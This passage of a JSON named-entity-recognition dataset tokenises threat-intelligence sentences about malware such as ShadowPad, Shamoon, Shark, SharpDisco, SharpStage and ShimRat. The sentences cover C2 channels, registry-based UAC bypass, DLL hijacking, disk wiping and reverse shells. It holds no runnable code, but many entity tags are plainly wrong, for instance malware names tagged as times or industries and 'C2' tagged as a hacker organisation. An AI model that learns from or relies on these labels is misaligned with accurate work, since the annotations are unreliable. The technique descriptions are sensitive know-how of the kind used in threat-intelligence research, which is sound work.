- ], - "ner_tags": [ - "B-Way", - "O", - "I-Way", - "I-Way", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "ShadowPad", - "has", - "used", - "FTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "ShadowPad", - "maintains", - "a", - "configuration", - "block", - "and", - "virtual", - "file", - "system", - "in", - "the", - "Registry." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShadowPad", - "has", - "deleted", - "arbitrary", - "Registry", - "values." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShadowPad", - "has", - "downloaded", - "code", - "from", - "a", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShadowPad", - "can", - "modify", - "the", - "Registry", - "to", - "store", - "and", - "maintain", - "a", - "configuration", - "block", - "and", - "virtual", - "file", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "B-Features", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShadowPad", - "has", - "used", - "UDP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShadowPad", - "has", - "encoded", - "data", - "as", - "readable", - "Latin", - "characters." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShadowPad", - "has", - "encrypted", - "its", - "payload,", - "a", - "virtual", - "file", - "system,", - "and", - "various", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShadowPad", - "has", - "collected", - "the", - "PID", - "of", - "a", - "malicious", - "process." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShadowPad", - "has", - "injected", - "an", - "install", - "module", - "into", - "a", - "newly", - "created", - "process." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShadowPad", - "has", - "sent", - "data", - "back", - "to", - "C2", - "every", - "8", - "hours." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShadowPad", - "has", - "discovered", - "system", - "information", - "including", - "memory", - "status,", - "CPU", - "frequency,", - "OS", - "versions,", - "and", - "volume", - "serial", - "numbers." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShadowPad", - "has", - "collected", - "the", - "domain", - "name", - "of", - "the", - "victim", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShadowPad", - "has", - "collected", - "the", - "username", - "of", - "the", - "victim", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShadowPad", - "has", - "collected", - "the", - "current", - "date", - "and", - "time", - "of", - "the", - "victim", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShadowPad", - "communicates", - "over", - "HTTP", - "to", - "retrieve", - "a", - "string", - "that", - "is", - "decoded", - "into", - "a", - "C2", - "server", - "URL." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shamoon", - "attempts", - "to", - "disable", - "UAC", - "remote", - "restrictions", - "by", - "modifying", - "the", - "Registry." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Shamoon", - "attempts", - "to", - "overwrite", - "operating", - "system", - "files", - "and", - "disk", - "structures", - "with", - "image", - "files.", - "In", - "a", - "later", - "variant,", - "randomly", - "generated", - "data", - "was", - "used", - "for", - "data", - "overwrites." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Shamoon", - "has", - "an", - "operational", - "mode", - "for", - "encrypting", - "data", - "instead", - "of", - "overwriting", - "it." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shamoon", - "decrypts", - "ciphertext", - "using", - "an", - "XOR", - "cipher", - "and", - "a", - "base64-encoded", - "string." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shamoon", - "has", - "been", - "seen", - "overwriting", - "features", - "of", - "disk", - "structure", - "such", - "as", - "the", - "MBR." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Org", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "If", - "Shamoon", - "cannot", - "access", - "shares", - "using", - "current", - "privileges,", - "it", - "attempts", - "access", - "using", - "hard", - "coded,", - "domain-specific", - "credentials", - "gathered", - "earlier", - "in", - "the", - "intrusion." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shamoon", - "can", - "download", - "an", - "executable", - "to", - "run", - "on", - "the", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shamoon", - "attempts", - "to", - "copy", - "itself", - "to", - "remote", - "machines", - "on", - "the", - "network." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shamoon", - "creates", - "a", - "new", - "service", - "named", - "“ntssrv”", - "that", - "attempts", - "to", - "appear", - "legitimate;", - "the", - "service's", - "display", - "name", - "is", - "“Microsoft", - "Network", - "Realtime", - "Inspection", - "Service”", - "and", - "its", - "description", - "is", - "“Helps", - "guard", - "against", - "time", - "change", - "attempts", - "targeting", - "known", - "and", - "newly", - "discovered", - "vulnerabilities", - "in", - "network", - "time", - "protocols.”", - "Newer", - "versions", - "create", - "the", - "\"MaintenaceSrv\"", - "service,", - "which", - "misspells", - "the", - "word", - "\"maintenance.\"" - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Once", - "Shamoon", - "has", - "access", - "to", - "a", - "network", - "share,", - "it", - "enables", - "the", - "RemoteRegistry", - "service", - "on", - "the", - "target", - "system.", - "It", - "will", - "then", - "connect", - "to", - "the", - "system", - "with", - "RegConnectRegistryW", - "and", - "modify", - "the", - "Registry", - "to", - "disable", - "UAC", - "remote", - "restrictions", - "by", - "setting", - "<code>SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy</code>", - "to", - "1." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Shamoon", - "contains", - "base64-encoded", - "strings." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shamoon", - "queries", - "several", - "Registry", - "keys", - "to", - "identify", - "hard", - "disk", - "partitions", - "to", - "overwrite." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shamoon", - "scans", - "the", - "C-class", - "subnet", - "of", - "the", - "IPs", - "on", - "the", - "victim's", - "interfaces." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shamoon", - "accesses", - "network", - "share(s),", - "enables", - "share", - "access", - "to", - "the", - "target", - "device,", - "copies", - "an", - "executable", - "payload", - "to", - "the", - "target", - "system,", - "and", - "uses", - "a", - "Scheduled", - "Task/Job", - "to", - "execute", - "the", - "malware." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shamoon", - "copies", - "an", - "executable", - "payload", - "to", - "the", - "target", - "system", - "by", - "using", - "SMB/Windows", - "Admin", - "Shares", - "and", - "then", - "scheduling", - "an", - "unnamed", - "task", - "to", - "execute", - "the", - "malware." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shamoon", - "creates", - "a", - "new", - "service", - "named", - "“ntssrv”", - "to", - "execute", - "the", - "payload.", - "Shamoon", - "can", - "also", - "spread", - "via", - "PsExec." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Shamoon", - "obtains", - "the", - "victim's", - "operating", - "system", - "version", - "and", - "keyboard", - "layout", - "and", - "sends", - "the", - "information", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shamoon", - "obtains", - "the", - "target's", - "IP", - "address", - "and", - "local", - "network", - "segment." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shamoon", - "will", - "reboot", - "the", - "infected", - "system", - "once", - "the", - "wiping", - "functionality", - "has", - "been", - "completed." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shamoon", - "obtains", - "the", - "system", - "time", - "and", - "will", - "only", - "activate", - "if", - "it", - "is", - "greater", - "than", - "a", - "preset", - "date." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shamoon", - "can", - "change", - "the", - "modified", - "time", - "for", - "files", - "to", - "evade", - "forensic", - "detection." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shamoon", - "can", - "impersonate", - "tokens", - "using", - "<code>LogonUser</code>,", - "<code>ImpersonateLoggedOnUser</code>,", - "and", - "<code>ImpersonateNamedPipeClient</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Shamoon", - "has", - "used", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Shamoon", - "creates", - "a", - "new", - "service", - "named", - "“ntssrv”", - "to", - "execute", - "the", - "payload.", - "Newer", - "versions", - "create", - "the", - "\"MaintenaceSrv\"", - "and", - "\"hdv_725x\"", - "services." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Shark", - "can", - "use", - "DNS", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shark", - "has", - "stored", - "information", - "in", - "folders", - "named", - "`U1`", - "and", - "`U2`", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shark", - "can", - "upload", - "files", - "to", - "its", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shark", - "can", - "extract", - "and", - "decrypt", - "downloaded", - ".zip", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Shark", - "can", - "send", - "DNS", - "C2", - "communications", - "using", - "a", - "unique", - "domain", - "generation", - "algorithm." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shark", - "can", - "use", - "encrypted", - "and", - "encoded", - "files", - "for", - "C2", - "configuration." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shark", - "has", - "the", - "ability", - "to", - "upload", - "files", - "from", - "the", - "compromised", - "host", - "over", - "a", - "DNS", - "or", - "HTTP", - "C2", - "channel." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "Shark", - "can", - "update", - "its", - "configuration", - "to", - "use", - "a", - "different", - "C2", - "server." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "Shark", - "can", - "delete", - "files", - "downloaded", - "to", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shark", - "can", - "download", - "additional", - "files", - "from", - "its", - "C2", - "via", - "HTTP", - "or", - "DNS." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Shark", - "binaries", - "have", - "been", - "named", - "`audioddg.pdb`", - "and", - "`Winlangdb.pdb`", - "in", - "order", - "to", - "appear", - "legitimate." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shark", - "can", - "query", - "`HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", - "MachineGuid`", - "to", - "retrieve", - "the", - "machine", - "GUID." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shark", - "can", - "pause", - "C2", - "communications", - "for", - "a", - "specified", - "time." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shark", - "can", - "stop", - "execution", - "if", - "the", - "screen", - "width", - "of", - "the", - "targeted", - "machine", - "is", - "not", - "over", - "600", - "pixels." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shark", - "can", - "collect", - "the", - "GUID", - "of", - "a", - "targeted", - "machine." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shark", - "has", - "the", - "ability", - "to", - "use", - "HTTP", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shark", - "has", - "the", - "ability", - "to", - "use", - "`CMD`", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SharpDisco", - "has", - "dropped", - "a", - "recent-files", - "stealer", - "plugin", - "to", - "`C:\\Users\\Public\\WinSrcNT\\It11.exe`." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SharpDisco", - "can", - "load", - "a", - "plugin", - "to", - "exfiltrate", - "stolen", - "files", - "to", - "SMB", - "shares", - "also", - "used", - "in", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SharpDisco", - "has", - "the", - "ability", - "to", - "transfer", - "data", - "between", - "SMB", - "shares." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "SharpDisco", - "can", - "identify", - "recently", - "opened", - "files", - "by", - "using", - "an", - "LNK", - "format", - "parser", - "to", - "extract", - "the", - "original", - "file", - "path", - "from", - "LNK", - "files", - "found", - "in", - "either", - "`%USERPROFILE%\\Recent`", - "(Windows", - "XP)", - "or", - "`%APPDATA%\\Microsoft\\Windows\\Recent`", - "(newer", - "Windows", - "versions)", - "." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SharpDisco", - "can", - "hide", - "windows", - "using", - "`ProcessWindowStyle.Hidden`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SharpDisco", - "has", - "been", - "used", - "to", - "download", - "a", - "Python", - "interpreter", - "to", - "`C:\\Users\\Public\\WinTN\\WinTN.exe`", - "as", - "well", - "as", - "other", - "plugins", - "from", - "external", - "sources." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SharpDisco", - "can", - "leverage", - "Native", - "APIs", - "through", - "plugins", - "including", - "`GetLogicalDrives`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SharpDisco", - "has", - "dropped", - "a", - "plugin", - "to", - "monitor", - "external", - "drives", - "to", - "`C:\\Users\\Public\\It3.exe`." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SharpDisco", - "can", - "create", - "scheduled", - "tasks", - "to", - "execute", - "reverse", - "shells", - "that", - "read", - "and", - "write", - "data", - "to", - "and", - "from", - "specified", - "SMB", - "shares." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "SharpDisco", - "can", - "use", - "a", - "plugin", - "to", - "enumerate", - "system", - "drives." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SharpDisco", - "can", - "use", - "`cmd.exe`", - "to", - "execute", - "plugins", - "and", - "to", - "send", - "command", - "output", - "to", - "specified", - "SMB", - "shares." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SharpStage", - "has", - "decompressed", - "data", - "received", - "from", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SharpStage", - "has", - "the", - "ability", - "to", - "download", - "and", - "execute", - "additional", - "payloads", - "via", - "a", - "DropBox", - "API." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "SharpStage", - "can", - "execute", - "arbitrary", - "commands", - "with", - "PowerShell." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SharpStage", - "has", - "the", - "ability", - "to", - "create", - "persistence", - "for", - "the", - "malware", - "using", - "the", - "Registry", - "autorun", - "key", - "and", - "startup", - "folder." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SharpStage", - "has", - "a", - "persistence", - "component", - "to", - "write", - "a", - "scheduled", - "task", - "for", - "the", - "payload." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SharpStage", - "has", - "the", - "ability", - "to", - "capture", - "the", - "victim's", - "screen." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "SharpStage", - "has", - "checked", - "the", - "system", - "settings", - "to", - "see", - "if", - "Arabic", - "is", - "the", - "configured", - "language." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SharpStage", - "has", - "been", - "used", - "to", - "target", - "Arabic-speaking", - "users", - "and", - "used", - "code", - "that", - "checks", - "if", - "the", - "compromised", - "machine", - "has", - "the", - "Arabic", - "language", - "installed." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Area", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SharpStage", - "has", - "used", - "a", - "legitimate", - "web", - "service", - "for", - "evading", - "detection." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SharpStage", - "can", - "execute", - "arbitrary", - "commands", - "with", - "the", - "command", - "line." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SharpStage", - "can", - "use", - "WMI", - "for", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRat", - "has", - "installed", - "shim", - "databases", - "in", - "the", - "<code>AppPatch</code>", - "folder." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRat", - "has", - "hijacked", - "the", - "cryptbase.dll", - "within", - "migwiz.exe", - "to", - "escalate", - "privileges.", - "This", - "prevented", - "the", - "User", - "Access", - "Control", - "window", - "from", - "appearing." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRat", - "has", - "the", - "capability", - "to", - "upload", - "collected", - "files", - "to", - "a", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRat", - "has", - "decompressed", - "its", - "core", - "DLL", - "using", - "shellcode", - "once", - "an", - "impersonated", - "antivirus", - "component", - "was", - "running", - "on", - "a", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRat", - "can", - "use", - "pre-configured", - "HTTP", - "proxies." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "ShimRat", - "has", - "used", - "a", - "secondary", - "C2", - "location", - "if", - "the", - "first", - "was", - "unavailable." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRat", - "can", - "uninstall", - "itself", - "from", - "compromised", - "hosts,", - "as", - "well", - "create", - "and", - "modify", - "directories,", - "delete,", - "move,", - "copy,", - "and", - "rename", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "B-Features", - "B-Features", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "ShimRat", - "can", - "list", - "directories." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "ShimRat", - "can", - "hijack", - "the", - "cryptbase.dll", - "within", - "migwiz.exe", - "to", - "escalate", - "privileges", - "and", - "bypass", - "UAC", - "controls." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRat", - "can", - "download", - "additional", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "ShimRat", - "can", - "impersonate", - "Windows", - "services", - "and", - "antivirus", - "products", - "to", - "avoid", - "detection", - "on", - "compromised", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Tool", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRat", - "has", - "registered", - "two", - "registry", - "keys", - "for", - "shim", - "databases." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRat", - "has", - "used", - "Windows", - "API", - "functions", - "to", - "install", - "the", - "service", - "and", - "shim." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRat", - "can", - "enumerate", - "connected", - "drives", - "for", - "infected", - "host", - "machines." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRat", - "has", - "been", - "delivered", - "as", - "a", - "package", - "that", - "includes", - "compressed", - "DLL", - "and", - "shellcode", - "payloads", - "within", - "a", - ".dat", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - 